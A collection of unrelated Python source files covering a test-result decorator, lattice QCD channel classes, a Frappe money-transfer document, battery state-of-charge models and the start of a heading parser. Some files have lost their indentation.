        if method is None:
            return
        return method(new_tags, gone_tags)

    def time(self, a_datetime):
        # time() is optional; silently ignore if absent.
        method = getattr(self.decorated, 'time', None)
        if method is None:
            return
        return method(a_datetime)

    def wasSuccessful(self):
        return self.decorated.wasSuccessful()
class _StringException(Exception):
    """An exception made from an arbitrary string."""

    # On Python 2 enforce unicode input and encode for __str__; selected at
    # class-definition time via the compat flag.
    if not str_is_unicode:
        def __init__(self, string):
            if type(string) is not unicode:
                raise TypeError("_StringException expects unicode, got %r" %
                    (string,))
            Exception.__init__(self, string)

        def __str__(self):
            return self.args[0].encode("utf-8")

        def __unicode__(self):
            return self.args[0]
    # For 3.0 and above the default __str__ is fine, so we don't define one.

    def __hash__(self):
        # Identity-based hash: two equal instances may hash differently.
        return id(self)

    def __eq__(self, other):
        # Equal when the other exception carries the same args.
        try:
            return self.args == other.args
        except AttributeError:
            return False
def _format_text_attachment(name, text):
if '\n' in text:
return "%s: {{{\n%s\n}}}\n" % (name, text)
return "%s: {{{%s}}}" % (name, text)
def _details_to_str(details, special=None):
    """Convert a details dict to a string.

    :param details: A dictionary mapping short names to ``Content`` objects.
    :param special: If specified, an attachment that should have special
        attention drawn to it. The primary attachment. Normally it's the
        traceback that caused the test to fail.
    :return: A formatted string that can be included in text test results.
    """
    empty_attachments = []
    binary_attachments = []
    text_attachments = []
    special_content = None
    # sorted() keeps the output deterministic for testing; may want to use a
    # dict subclass with a defined item order instead.
    for key, content in sorted(details.items()):
        if content.content_type.type != 'text':
            binary_attachments.append((key, content.content_type))
        else:
            text = _u('').join(content.iter_text()).strip()
            if not text:
                empty_attachments.append(key)
            elif key == special:
                # The 'special' attachment goes at the bottom of the output.
                special_content = '%s\n' % (text,)
            else:
                text_attachments.append(_format_text_attachment(key, text))
    if text_attachments and not text_attachments[-1].endswith('\n'):
        # Guarantee a newline before the special content / end of output.
        text_attachments.append('')
    if special_content:
        text_attachments.append(special_content)
    sections = []
    if binary_attachments:
        sections.append('Binary content:\n')
        for name, content_type in binary_attachments:
            sections.append(' %s (%s)\n' % (name, content_type))
    if empty_attachments:
        sections.append('Empty attachments:\n')
        for name in empty_attachments:
            sections.append(' %s\n' % (name,))
    if (binary_attachments or empty_attachments) and text_attachments:
        # Blank line between the summary sections and the text attachments.
        sections.append('\n')
    sections.append('\n'.join(text_attachments))
    return _u('').join(sections)
|
import abc
import subprocess
import logging
from observables import BLOperator, MCObservable
from data import BLDataChannel, GIDataChannel
import util
class Channel(metaclass=abc.ABCMeta):
    """Abstract base class for a scattering/hadron channel.

    Concrete subclasses (SpecialChannel, AtRestChannel, MovingChannel) define
    ``channel_string``; equality, ordering and hashing are all derived from
    ``__repr__``.
    """

    # Maps spelled-out isospin names to the short labels used in channel
    # strings ("h" denotes a half, e.g. "1h" = 1/2).
    ISOSPIN_MAP = {
        'singlet': "0",
        'doublet': "1h",
        'triplet': "1",
        'quartet': "3h",
        'quintet': "2",
        'sextet': "5h"
    }

    def __init__(self, *, particle_type=None, isospin, strangeness=None, laph_query="laph_query",
                 sigmond_query="sigmond_query"):
        """Store channel quantum numbers and the query executable names.

        :param particle_type: "boson"/"fermion" or None when unknown.
        :param isospin: A key of ISOSPIN_MAP (e.g. 'triplet').
        :param strangeness: Integer strangeness, or None when unknown.
        :param laph_query: Executable used to query basic-LapH data files.
        :param sigmond_query: Executable used to query sigmond data files.
        """
        self.particle_type = particle_type
        self.strangeness = strangeness
        self.isospin = isospin
        self.laph_query = laph_query
        self.sigmond_query = sigmond_query
        # @ADH - I think I am going to have the DataHandler deal with these in the future
        self.raw_data_channels = list()

    @staticmethod
    def initialize(*, data_file, laph_query="laph_query", sigmond_query="sigmond_query",
                   is_basic_laph=True):
        """Build the appropriate Channel subclass by inspecting a data file.

        Runs the external query tool on ``data_file``, parses the XML reply
        and dispatches on the operator's momentum / file location.

        :returns: A SpecialChannel, MovingChannel or AtRestChannel instance,
            or None when a sigmond file has no usable records.
        """
        if is_basic_laph:
            query_result = subprocess.check_output([laph_query, '-i', data_file]).decode()
            laph_xml = util.queryToXML(query_result)
            operator = BLOperator.createFromXML(laph_xml.find(".//Operator"))
            # Files living in a 'special' path component get their own type.
            if 'special' in data_file.split('/'):
                return SpecialChannel(particle_type=operator.particle_type, isospin=operator.isospin,
                                      strangeness=operator.strangeness, flavor=operator.flavor,
                                      laph_query=laph_query, sigmond_query=sigmond_query)
            elif operator.psq > 0:
                # Non-zero squared momentum -> moving frame.
                return MovingChannel(particle_type=operator.particle_type, isospin=operator.isospin,
                                     strangeness=operator.strangeness, psq=operator.psq,
                                     lg_irrep=operator.lg_irrep, laph_query=laph_query,
                                     sigmond_query=sigmond_query)
            else:
                return AtRestChannel(particle_type=operator.particle_type, isospin=operator.isospin,
                                     strangeness=operator.strangeness, lg_irrep=operator.lg_irrep,
                                     laph_query=laph_query, sigmond_query=sigmond_query)
        else:
            query_result = subprocess.check_output([sigmond_query, '-k', data_file]).decode()
            try:
                # records[1] is the first real record; IndexError below means
                # the file contained none.
                records = query_result.split('Record')
                observable = MCObservable.createFromXML(util.queryToXML(records[1]))
                if observable.psq > 0:
                    return MovingChannel(isospin=observable.isospin, psq=observable.psq,
                                         lg_irrep=observable.lg_irrep, laph_query=laph_query,
                                         sigmond_query=sigmond_query)
                else:
                    return AtRestChannel(isospin=observable.isospin, lg_irrep=observable.lg_irrep,
                                         laph_query=laph_query, sigmond_query=sigmond_query)
            except IndexError:
                logging.warning("%s contains no records", data_file)
            except AttributeError:
                logging.warning("%s contains Observables", data_file)
            return None

    def addRawDataChannel(self, path, is_basic_laph=True):
        """Attach a raw data channel of the appropriate backend type."""
        if is_basic_laph:
            self.raw_data_channels.append(BLDataChannel(path, self.laph_query))
        else:
            self.raw_data_channels.append(GIDataChannel(path, self.sigmond_query))

    @property
    @abc.abstractmethod
    def channel_string(self):
        """Human-readable identifier string; defined by subclasses."""
        pass

    @property
    def is_special(self):
        return isinstance(self, SpecialChannel)

    @property
    def is_atrest(self):
        return isinstance(self, AtRestChannel)

    @property
    def is_moving(self):
        return isinstance(self, MovingChannel)

    def __hash__(self):
        # Hash/equality/ordering all funnel through __repr__.
        return hash(self.__repr__())

    def __str__(self):
        return self.channel_string

    # @ADH - Should be checking that 'other' is an instance of an object
    #        derived from Channel. I'm not sure how to best do that right now.
    #        So, this will suffice for the moment.
    def __eq__(self, other):
        return self.__repr__() == other.__repr__()

    def __ne__(self, other):
        return self.__repr__() != other.__repr__()

    def __lt__(self, other):
        return self.__repr__() < other.__repr__()

    def __gt__(self, other):
        return self.__repr__() > other.__repr__()

    def __le__(self, other):
        return self.__repr__() <= other.__repr__()

    def __ge__(self, other):
        return self.__repr__() >= other.__repr__()
class SpecialChannel(Channel):
    """A channel for operators stored under a 'special' data-file path."""

    def __init__(self, *, particle_type, isospin, strangeness, flavor, laph_query="laph_query",
                 sigmond_query="sigmond_query"):
        """Store quantum numbers; unlike the siblings, particle_type,
        strangeness and flavor are required here.

        :param particle_type: "boson" or "fermion".
        :param flavor: Flavor label embedded in the channel string.
        """
        super().__init__(particle_type=particle_type, isospin=isospin, strangeness=strangeness,
                         laph_query=laph_query, sigmond_query=sigmond_query)
        self.flavor = flavor

    @property
    def channel_string(self):
        """Identifier like ``B_<flavor>_I<isospin>_S<strangeness>_special``."""
        if self.particle_type == "boson":
            particle_type = "B"
        elif self.particle_type == "fermion":
            particle_type = "F"
        else:
            # Previously any other value crashed with an accidental
            # UnboundLocalError; fail with an explicit, descriptive error.
            raise ValueError(
                "unknown particle_type: {!r}".format(self.particle_type))
        # Negative strangeness is encoded with 'm' (minus), e.g. -1 -> "m1".
        strangeness = str(self.strangeness).replace('-', 'm')
        return "{p_type}_{flavor}_I{isospin}_S{strangeness}_special".format(
            p_type=particle_type, flavor=self.flavor, isospin=self.ISOSPIN_MAP[self.isospin],
            strangeness=strangeness)

    def __repr__(self):
        return "SP_{}".format(self.channel_string)
class AtRestChannel(Channel):
    """A channel with zero total momentum (``psq`` fixed to 0)."""

    def __init__(self, *, particle_type=None, isospin, strangeness=None, lg_irrep,
                 laph_query="laph_query", sigmond_query="sigmond_query"):
        """Store quantum numbers plus the little-group irrep label."""
        super().__init__(particle_type=particle_type, isospin=isospin, strangeness=strangeness,
                         laph_query=laph_query, sigmond_query=sigmond_query)
        # At rest by definition.
        self.psq = 0
        self.lg_irrep = lg_irrep

    @property
    def channel_string(self):
        """Identifier like ``B_I1_Sm1_P0_A1``; optional parts are omitted
        when the corresponding attribute is None/unknown."""
        type_prefixes = {"boson": "B_", "fermion": "F_"}
        p_type = type_prefixes.get(self.particle_type, "")
        if self.strangeness is None:
            s_part = ""
        else:
            # Negative strangeness encoded with 'm' (minus), e.g. -1 -> "Sm1_".
            s_part = "S{}_".format(self.strangeness).replace('-', 'm')
        return "{p_type}I{isospin}_{strangeness}P0_{irrep}".format(
            p_type=p_type, isospin=self.ISOSPIN_MAP[self.isospin], strangeness=s_part,
            irrep=self.lg_irrep)

    def __repr__(self):
        return "AR_" + self.channel_string
class MovingChannel(Channel):
    """A channel with non-zero total momentum (``psq`` > 0)."""

    def __init__(self, *, particle_type=None, isospin, strangeness=None, psq, lg_irrep,
                 laph_query="laph_query", sigmond_query="sigmond_query"):
        """Store quantum numbers, squared momentum and the irrep label."""
        super().__init__(particle_type=particle_type, isospin=isospin, strangeness=strangeness,
                         laph_query=laph_query, sigmond_query=sigmond_query)
        self.psq = psq
        self.lg_irrep = lg_irrep

    @property
    def channel_string(self):
        """Identifier like ``B_I1_Sm1_PSQ2_A1``; optional parts are omitted
        when the corresponding attribute is None/unknown."""
        type_prefixes = {"boson": "B_", "fermion": "F_"}
        p_type = type_prefixes.get(self.particle_type, "")
        if self.strangeness is None:
            s_part = ""
        else:
            # Negative strangeness encoded with 'm' (minus), e.g. -1 -> "Sm1_".
            s_part = "S{}_".format(self.strangeness).replace('-', 'm')
        return "{p_type}I{isospin}_{strangeness}PSQ{psq}_{irrep}".format(
            p_type=p_type, isospin=self.ISOSPIN_MAP[self.isospin], strangeness=s_part,
            psq=self.psq, irrep=self.lg_irrep)

    def __repr__(self):
        return "MV_" + self.channel_string
|
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe.utils.data import flt, nowdate, getdate, cint
class MoneyTransfere(Document):
def on_submit(self):
self.validate_transfere()
def validate(self):
self.get_dummy_accounts()
def get_dummy_accounts(self):
dummy_to = frappe.db.get_values("Account", {"name": "حساب استلام من"+" - "+self.from_company + " - "+self.abbr_to,
"company": self.to_company,
"parent_account":"حساب استلام من"+" - "+self.abbr_to })
self.dummy_to=dummy_to[0][0]
dummy_from = frappe.db.get_values("Account", {"name": "حساب ارسال الي"+" - "+self.to_company + " - "+self.abbr,
"company": self.from_company,
"parent_account":"حساب ارسال"+" - "+self.abbr })
self.dummy_from=dummy_from[0][0]
def before_cancel(self):
pe = frappe.get_value("Payment Entry", filters = {"transfere_reference": self.name}, fieldname = "name")
if pe:
pe_doc = frappe.get_doc("Payment Entry", pe)
pe_doc.cancel()
je = frappe.get_value("Journal Entry Account", filters = {"reference_name": self.name}, fieldname = "parent")
if je:
je_doc = frappe.get_doc("Journal Entry", je)
je_doc.cancel()
def validate_transfere(self):
if self.from_company != self.to_company:
# sending_account = "حساب ارسال الى " + self.to_company
# receiving_account = "حساب استلام من " + self.from_company
# self.add_account_for_company(sending_account, self.to_company, "Liability")
# self.add_account_for_company(receiving_account, self.from_company, "Expense")
self.add_payment_entry(self.from_account, self.dummy_from, self.from_company)
self.add_journal_entry(self.to_account,self.dummy_to, self.to_company)
else:
self.add_payment_entry(self.from_account, self.to_account, self.from_company)
def add_account_for_company(self, account, company, r_type):
pass
# pacc_name = ""
# if r_type == "Expense":
# pacc_name = "حساب ارسال - E"
# elif r_type == "Liability":
# pacc_name = "حساب استقبال - o"
# # if not frappe.db.exists("Account", pacc_name):
# # pacc = frappe.new_doc("Account")
# # pacc.account_name = pacc_name
# # pacc.root_type = r_type
# # pacc.is_group = 1
# # pacc.parent_account = ""
# # pacc.company = company
# # pacc.flags.ignore_validate = True
# # pacc.insert()
# if not frappe.db.exists("Account", account):
# acc = frappe.new_doc("Account")
# acc.account_name = account
# acc.company = company
# acc.parent_account = pacc_name
# acc.is_group = 0
# acc.insert()
def add_payment_entry(self, paid_from, paid_to, company):
pe = frappe.new_doc("Payment Entry")
pe.payment_type = "Internal Transfer"
pe.company = company
pe.paid_from = paid_from
pe.paid_to = paid_to
pe.paid_amount = self.transfered_amount
pe.received_amount = self.transfered_amount
pe.posting_date = nowdate()
pe.mode_of_payment = self.mode_of_payment
pe.transfere_reference = self.name
pe.insert()
pe.submit()
# pe.setup_party_account_field()
# pe.set_missing_values()
# pe.set_exchange_rate()
# pe.set_amounts()
# self.assertEquals(pe.difference_amount, 500)
# pe.append("deductions", {
# "account": "_Test Exchange Gain/Loss - _TC",
# "cost_center": "_Test Cost Center - _TC",
# "amount": 500
# })
def add_journal_entry(self, account1, account2, company):
    """Create and submit a Journal Entry moving the transferred amount.

    account2 is credited and account1 is debited for
    ``self.transfered_amount`` in *company*, both rows carrying the
    company's default cost center and a reference back to this document.
    """
    default_cost = frappe.get_value("Company", filters = {"name":company}, fieldname = "cost_center")
    jv = frappe.new_doc("Journal Entry")
    jv.posting_date = nowdate()
    jv.company = company
    # NOTE(review): voucher_type "Opening Entry" looks unusual for a
    # transfer booking — confirm this is intentional.
    jv.voucher_type = "Opening Entry"
    jv.set("accounts", [
        {
            "account": account2,
            "credit_in_account_currency": self.transfered_amount,
            "cost_center": default_cost,
            "reference_type": "Money Transfere",
            "reference_name": self.name
        }, {
            "account": account1,
            "debit_in_account_currency": self.transfered_amount,
            "cost_center": default_cost,
            "reference_type": "Money Transfere",
            "reference_name": self.name
        }
    ])
    jv.insert()
    jv.submit()
|
import numpy as np
def min_max_model(power, use, battery_capacity):
    """
    Minimal maximum battery model, obsoleted.

    Generalized to accept any iterable of power values (pandas TimeSeries,
    numpy array or plain list); it previously required a ``.tolist()``
    method, which a plain list does not have.

    :param power: iterable, total power from renewable system, unit W
    :param use: float, unit W fixed load of the power system
    :param battery_capacity: float, unit Wh battery capacity
    :return: list, energy history in battery
    """
    energy = 0
    energy_history = []
    for p in power:
        # One-hour time step: the surplus (p - use) charges the battery,
        # clamped between empty (0) and full (battery_capacity).
        energy = min(battery_capacity, max(0, energy + (p - use) * 1))
        energy_history.append(energy)
    return energy_history
def soc_model_fixed_load(
    power,
    use,
    battery_capacity,
    depth_of_discharge=1,
    discharge_rate=0.005,
    battery_eff=0.9,
    discharge_eff=0.8,
):
    """
    Battery state of charge model with fixed load. (Obsolete)

    :param power: Pandas TimeSeries of total power from renewable system
    :param use: float unit W fixed load of the power system
    :param battery_capacity: float unit Wh battery capacity
    :param depth_of_discharge: float 0 to 1 maximum allowed discharge depth
    :param discharge_rate: self discharge rate per time step
    :param battery_eff: optional 0 to 1 battery energy store efficiency default 0.9
    :param discharge_eff: battery discharge efficiency 0 to 1 default 0.8
    :return: tuple SOC: state of charge, energy history: E in battery,
        unmet_history: unmet energy history, waste_history: waste energy
        history, use_history: supplied load history
    """
    DOD = depth_of_discharge
    power = power.tolist()
    use_history = []
    waste_history = []
    unmet_history = []
    energy_history = []
    energy = 0
    for p in power:
        if p >= use:
            # Generation covers the load; the surplus charges the battery.
            use_history.append(use)
            unmet_history.append(0)
            energy_new = energy * (1 - discharge_rate) + (p - use) * battery_eff
            if energy_new < battery_capacity:
                energy = energy_new  # battery energy got update
                waste_history.append(0)
            else:
                # NOTE(review): when the battery would overflow, the whole
                # surplus is booked as waste and the battery is NOT topped
                # up to capacity (energy keeps its previous value) — confirm
                # this simplification is intended; Battery_managed below
                # handles the same case differently.
                waste_history.append(p - use)
                energy = energy
        elif p < use:
            # Deficit: try to bridge the gap by discharging the battery.
            energy_new = energy * (1 - discharge_rate) + (p - use) / discharge_eff
            if energy_new > (1 - DOD) * battery_capacity:
                # The battery can cover the deficit within the DOD limit.
                energy = energy_new
                unmet_history.append(0)
                waste_history.append(0)
                use_history.append(use)
            elif energy * (1 - discharge_rate) + p * battery_eff < battery_capacity:
                # Load cannot be met at all; store all generation instead.
                energy = energy * (1 - discharge_rate) + p * battery_eff
                unmet_history.append(use - p)
                use_history.append(0)
                waste_history.append(0)
            else:
                # Load cannot be met and the battery is (nearly) full.
                unmet_history.append(use - p)
                use_history.append(0)
                waste_history.append(p)
                energy = energy
        energy_history.append(energy)
    if battery_capacity == 0:
        # Avoid division by zero: report absolute Wh instead of a ratio.
        SOC = np.array(energy_history)
    else:
        SOC = np.array(energy_history) / battery_capacity
    return SOC, energy_history, unmet_history, waste_history, use_history
class Battery:
    """
    A simple finite state based energy flow battery model.

    Tracks the battery energy over a power/load profile and records the
    supplied, unmet and wasted energy at every time step.
    """

    def __init__(self, capacity, config=None):
        """
        Initialise the battery with a given capacity and configuration.

        :param capacity: float, unit Wh
        :param config: dict with options under config['simulation']['battery']:
            DOD, depth of discharge; sigma, self-discharge rate; eta_in,
            charge efficiency; eta_out, discharge efficiency; B0, fraction
            of the battery pre-charged; all values shall be between 0 and 1
        """
        self.capacity = capacity
        # Fixed: the default used to be the mutable literal `{}`, which is
        # shared between all instances created without a config.
        self.config = {} if config is None else config
        self.set_parameters()

    def set_parameters(self):
        """
        Setup the parameters using the config file, options including DOD,
        depth of discharge; sigma, self-discharge rate; eta_in, charge
        efficiency; eta_out, discharge efficiency; B0, pre-charge fraction;
        where all values shall be between 0 and 1.  Falls back to defaults
        when any key is missing.
        """
        try:
            self.depth_of_discharge = self.config['simulation']['battery']['DOD']
            self.discharge_rate = self.config['simulation']['battery']['sigma']
            self.battery_eff = self.config['simulation']['battery']['eta_in']
            self.discharge_eff = self.config['simulation']['battery']['eta_out']
            self.init_charge = self.config['simulation']['battery']['B0']
        except KeyError:
            print('Parameter is not found in config file, default values are used.')
            self.depth_of_discharge = 1
            self.discharge_rate = 0.005
            self.battery_eff = 0.9
            self.discharge_eff = 0.8
            self.init_charge = 1

    def run(self, power, use):
        """
        Run the battery model with a list of power generation and usage.

        Resets all history lists, so only the last run is reported.

        :param power: list, power generation unit in W
        :param use: list, power usage unit in W
        :return: None
        """
        DOD = self.depth_of_discharge
        battery_capacity = self.capacity
        discharge_rate = self.discharge_rate
        discharge_eff = self.discharge_eff
        battery_eff = self.battery_eff
        use_history = []
        waste_history = []
        unmet_history = []
        energy_history = []
        SOC = []
        energy = self.init_charge * self.capacity
        for p, u in zip(power, use):
            if p >= u:
                # Generation covers the load; surplus charges the battery.
                use_history.append(u)
                unmet_history.append(0)
                energy_new = energy * (1 - discharge_rate) + (p - u) * battery_eff
                if energy_new < battery_capacity:
                    energy = energy_new  # battery energy got updated
                    waste_history.append(0)
                else:
                    # Battery would overflow: surplus is wasted, energy
                    # keeps its previous value (not topped to capacity).
                    waste_history.append(p - u)
                    energy = energy
            elif p < u:
                # Deficit: try to bridge the gap from the battery.
                energy_new = energy * (1 - discharge_rate) + (p - u) / discharge_eff
                if energy_new > (1 - DOD) * battery_capacity:
                    energy = energy_new
                    unmet_history.append(0)
                    waste_history.append(0)
                    use_history.append(u)
                elif energy * (1 - discharge_rate) + p * battery_eff < battery_capacity:
                    # Load cannot be met; store all generation instead.
                    energy = energy * (1 - discharge_rate) + p * battery_eff
                    unmet_history.append(u - p)
                    use_history.append(0)
                    waste_history.append(0)
                else:
                    # Load cannot be met and the battery is (nearly) full.
                    unmet_history.append(u - p)
                    use_history.append(0)
                    waste_history.append(p)
                    energy = energy
            energy_history.append(energy)
            SOC.append(energy / battery_capacity)
        self.SOC = SOC
        self.energy_history = energy_history
        self.unmet_history = unmet_history
        self.waste_history = waste_history
        self.use_history = use_history

    def battery_history(self):
        """
        Return the history of the battery.

        :return: np array of shape (5, steps): SOC, energy in the battery,
            unmet power supply, wasted power and the supplied power unit in W
        """
        history = np.vstack(
            (
                np.array(self.SOC),
                np.array(self.energy_history),
                np.array(self.unmet_history),
                np.array(self.waste_history),
                np.array(self.use_history),
            )
        )
        return history

    def lost_power_supply_probability(self):
        """
        Return the lost power supply probability (LPSP) of the last run.

        :return: float, fraction of steps where the load was not fully met
        """
        LPSP = 1 - self.unmet_history.count(0) / len(self.energy_history)
        return LPSP
class Battery_managed:
    """
    Battery managed is the basic class for the demand load controllable
    battery model: a finite state machine stepped one time slot at a time,
    recording a human-readable status string for each step.
    """

    def __init__(self, capacity, config={}):
        """
        :param capacity: float, unit Wh
        :param config: options including DOD, depth of discharge; sigma,
            self-discharge rate; eta_in, charge efficiency; eta_out,
            discharge efficiency; B0, percentage of the battery pre-charge;
            where all values shall be between 0 and 1
        """
        self.capacity = capacity
        self.config = config
        self.set_parameters()
        self.init_history()
        self.init_simulation()
        # per-step human readable status and state labels
        self.status = []
        self.states_list = []

    def set_parameters(self):
        """
        Setup the parameters using the config file, options including DOD,
        depth of discharge; sigma, self-discharge rate; eta_in, charge
        efficiency; eta_out, discharge efficiency; B0, pre-charge fraction;
        where all values shall be between 0 and 1.  Falls back to defaults
        when any key is missing.
        """
        try:
            self.depth_of_discharge = self.config['simulation']['battery']['DOD']
            self.discharge_rate = self.config['simulation']['battery']['sigma']
            self.battery_eff = self.config['simulation']['battery']['eta_in']
            self.discharge_eff = self.config['simulation']['battery']['eta_out']
            self.init_charge = self.config['simulation']['battery']['B0']
            self.DOD = self.depth_of_discharge
        except KeyError:
            print('Parameter is not found in config file, default values are used.')
            self.depth_of_discharge = 1
            self.discharge_rate = 0.005
            self.battery_eff = 0.9
            self.discharge_eff = 0.8
            self.init_charge = 1
            self.DOD = self.depth_of_discharge

    def reset(self):
        """
        Reset the battery state to the start of simulation.

        :return: None
        """
        self.init_history()
        self.init_simulation()

    def init_simulation(self):
        # start energy as the configured fraction of capacity
        self.energy = self.init_charge * self.capacity

    def init_history(self):
        # one entry per simulated step
        self.supply_history = []
        self.waste_history = []
        self.unmet_history = []
        self.battery_energy_history = []
        self.SOC = []

    def step(self, plan, generated, gym = False):
        """
        Run the finite state battery model on one time step.

        :param plan: float, planned power usage in W
        :param generated: float, power generation unit in W
        :param gym: optional, set True to using in OpenAI gym mode (then
            `plan` is assumed to be a nested sequence and plan[0][0] is used
            — confirm against the gym wrapper)
        :return: float, the supplied power in W
        """
        if gym == True:
            plan = plan[0][0]
        if generated >= plan:
            # Generation covers the plan; surplus charges the battery.
            self.supply_history.append(plan)
            self.unmet_history.append(0)
            energy_new = self.energy * (1 - self.discharge_rate) + (generated - plan) * self.battery_eff
            if energy_new < self.capacity:
                self.energy = energy_new  # battery energy got update
                self.waste_history.append(0)
                self.status.append("""Demand can be meet by generation, also battery is not full.
                Supply {demand}, charge {diff}.""".format(demand=plan, diff=generated - plan)
                                   )
                self.state = 'charge'
            else:
                # Overflow: waste what does not fit, clamp to capacity.
                self.waste_history.append(generated - plan - (self.capacity - self.energy))
                self.energy = self.capacity
                self.status.append("""Demand can be meet by generation, but battery is already full.
                Supply {demand}, charge battery to full waste {diff}.""".format(
                    demand=plan, diff=generated - plan)
                                   )
                self.state = 'float'
        elif generated < plan:
            # Deficit: try to bridge the gap from the battery.
            energy_new = self.energy * (1 - self.discharge_rate) + (generated - plan) / self.discharge_eff
            if energy_new > (1 - self.DOD) * self.capacity:
                self.energy = energy_new
                self.unmet_history.append(0)
                self.waste_history.append(0)
                self.supply_history.append(plan)
                self.status.append("""Demand can not meet by generation, power in battery can make up difference.
                Supply {demand} by discharge from battery""".format(demand=plan))
                self.state = 'discharge'
            elif self.energy * (1 - self.discharge_rate) + generated * self.battery_eff < self.capacity:
                # Plan cannot be met; store all generation instead.
                self.energy = self.energy * (1 - self.discharge_rate) + generated * self.battery_eff
                self.unmet_history.append(plan - generated)
                self.supply_history.append(0)
                self.waste_history.append(0)
                self.status.append("""Demand can not meet by generation, also power in battery can not make up difference.
                Charge {diff} to battery to avoid waste""".format(diff=generated))
                self.state = 'unmet'
            else:
                # Plan cannot be met and the battery is (nearly) full.
                self.unmet_history.append(plan - generated)
                self.supply_history.append(0)
                self.waste_history.append(generated - (self.capacity - self.energy))
                self.energy = self.capacity
                # NOTE(review): the status below evaluates
                # self.capacity - self.energy AFTER energy was clamped to
                # capacity, so it always reports "Charge 0" — confirm
                # whether the pre-clamp difference was intended.
                self.status.append("""Demand can not meet by generation, also power in battery can not make up difference.
                Charge {diff} to make battery full""".format(
                    diff=self.capacity-self.energy))
                self.state = 'unmet'
        self.states_list.append(self.state)
        self.battery_energy_history.append(self.energy)
        self.SOC.append(self.energy / self.capacity)
        self.supply = self.supply_history[-1]
        return self.supply

    def history(self):
        """
        Get the history of the managed battery.

        :return: np array of shape (5, steps): SOC, battery energy, unmet
            and wasted energy, supplied power
        """
        battery_history = np.vstack(
            (
                np.array(self.SOC),
                np.array(self.battery_energy_history),
                np.array(self.unmet_history),
                np.array(self.waste_history),
                np.array(self.supply_history),
            )
        )
        return battery_history

    def observation(self):
        """
        Observation of the current battery state.

        :return: dict with current_energy (Wh) and usable_capacity (Wh)
        """
        battery_state = {
            'current_energy': self.energy,
            'usable_capacity': self.DOD * self.capacity,
        }
        return battery_state

    def story_board(self):
        """
        For the use of explainable AI in power management system.

        :return: list of per-step status strings
        """
        return self.status

    def lost_power_supply_probability(self):
        """
        Get the lost power supply probability of the managed battery after run.

        :return: float, LPSP
        """
        LPSP = 1 - self.unmet_history.count(0) / len(self.SOC)
        return LPSP

    def copy(self):
        """
        Make a copy of battery model.

        :return: fresh Battery_managed with same capacity and configuration
            (histories are NOT copied)
        """
        return Battery_managed(self.capacity, self.config)
class Soc_model_variable_load:
    """
    Obsolete basic class.

    Thin wrapper that immediately runs a battery model over a power/load
    profile and forwards its result queries.
    """

    def __init__(self, battery, power, load):
        """Store *battery* and run it on the given power and load series."""
        self.battery = battery
        battery.run(power, load)

    def get_lost_power_supply_probability(self):
        """Forward to the wrapped battery's LPSP calculation."""
        return self.battery.lost_power_supply_probability()

    def get_battery_history(self):
        """Forward to the wrapped battery's history array."""
        return self.battery.battery_history()

    def get_quality_performance_index(self):
        """Not implemented; returns None."""
        pass
def soc_model_variable_load(
    power,
    use,
    battery_capacity,
    depth_of_discharge=1,
    discharge_rate=0.005,
    battery_eff=0.9,
    discharge_eff=0.8,
):
    """
    Battery state of charge model with variable load.

    Fixed: in the "battery bridges the deficit" branch the whole `use`
    sequence was appended to use_history instead of the scalar load `u` of
    the current step.  Also generalized to accept any iterable for `power`
    and `use` (pandas TimeSeries, numpy array or plain list).

    :param power: iterable of total power from renewable system, unit W
    :param use: iterable of load of the power system, unit W
    :param battery_capacity: float unit Wh battery capacity
    :param depth_of_discharge: float 0 to 1 maximum allowed discharge depth
    :param discharge_rate: self discharge rate per time step
    :param battery_eff: optional 0 to 1 battery energy store efficiency default 0.9
    :param discharge_eff: battery discharge efficiency 0 to 1 default 0.8
    :return: tuple SOC: state of charge, energy history: E in battery,
        unmet_history: unmet energy history, waste_history: waste energy
        history, use_history: supplied load history
    """
    DOD = depth_of_discharge
    power = list(power)
    use = list(use)
    use_history = []
    waste_history = []
    unmet_history = []
    energy_history = []
    energy = 0
    for p, u in zip(power, use):
        if p >= u:
            # Generation covers the load; surplus charges the battery.
            use_history.append(u)
            unmet_history.append(0)
            energy_new = energy * (1 - discharge_rate) + (p - u) * battery_eff
            if energy_new < battery_capacity:
                energy = energy_new  # battery energy got update
                waste_history.append(0)
            else:
                # Battery would overflow: surplus is wasted, energy keeps
                # its previous value (consistent with soc_model_fixed_load).
                waste_history.append(p - u)
                energy = energy
        elif p < u:
            # Deficit: try to bridge the gap from the battery.
            energy_new = energy * (1 - discharge_rate) + (p - u) / discharge_eff
            if energy_new > (1 - DOD) * battery_capacity:
                energy = energy_new
                unmet_history.append(0)
                waste_history.append(0)
                # BUG FIX: was use_history.append(use), appending the
                # whole load sequence instead of this step's scalar load.
                use_history.append(u)
            elif energy * (1 - discharge_rate) + p * battery_eff < battery_capacity:
                # Load cannot be met; store all generation instead.
                energy = energy * (1 - discharge_rate) + p * battery_eff
                unmet_history.append(u - p)
                use_history.append(0)
                waste_history.append(0)
            else:
                # Load cannot be met and the battery is (nearly) full.
                unmet_history.append(u - p)
                use_history.append(0)
                waste_history.append(p)
                energy = energy
        energy_history.append(energy)
    if battery_capacity == 0:
        # Avoid division by zero: report absolute Wh instead of a ratio.
        SOC = np.array(energy_history)
    else:
        SOC = np.array(energy_history) / battery_capacity
    return SOC, energy_history, unmet_history, waste_history, use_history
if __name__ == '__main__':
    # Smoke test: the second run() overwrites the histories of the first,
    # so the printed LPSP reflects only the (unmeetable) 10 W load case.
    b1 = Battery(10)
    b1.run([1, 1, 1], [1, 1, 1])
    b1.run([1, 1, 1], [10, 10, 10])
    print(b1.lost_power_supply_probability())
|
import re
class HeadingsParser():
    """
    The HeadingsParser parses the document for headings.

    Underlined reStructuredText headings are converted to raw LaTeX
    sectioning commands with labels so that they can be referenced later.
    See https://www.sharelatex.com/learn/Sections_and_chapters for info
    about the levels.
    """

    def __init__(self):
        super().__init__()
        self.title = None
        self.subtitle = None
        self.heading = []
        # regexes
        self.title_start_marker_regex = re.compile(r'[=]{3,}')
        self.title_end_marker_regex = re.compile(r'[=]{3,}')
        self.title_content_regex = re.compile(
            r'''
            ^                               # beginning of line
            [ ]                             # one whitespace
            [A-Za-z0-9äöüÄÖÜ]+              # alphanumerical string, no whitespace
            (?P<title>[A-Za-z0-9äöüÄÖÜ ]+)  # alphanumerical string, whitespace ok
            [A-Za-z0-9äöüÄÖÜ]+              # alphanumerical string, no whitespace
            [ ]                             # one whitespace
            $                               # end of line
            ''', re.VERBOSE | re.UNICODE
        )
        self.subtitle_start_marker_regex = re.compile(r'[-]{3,}')
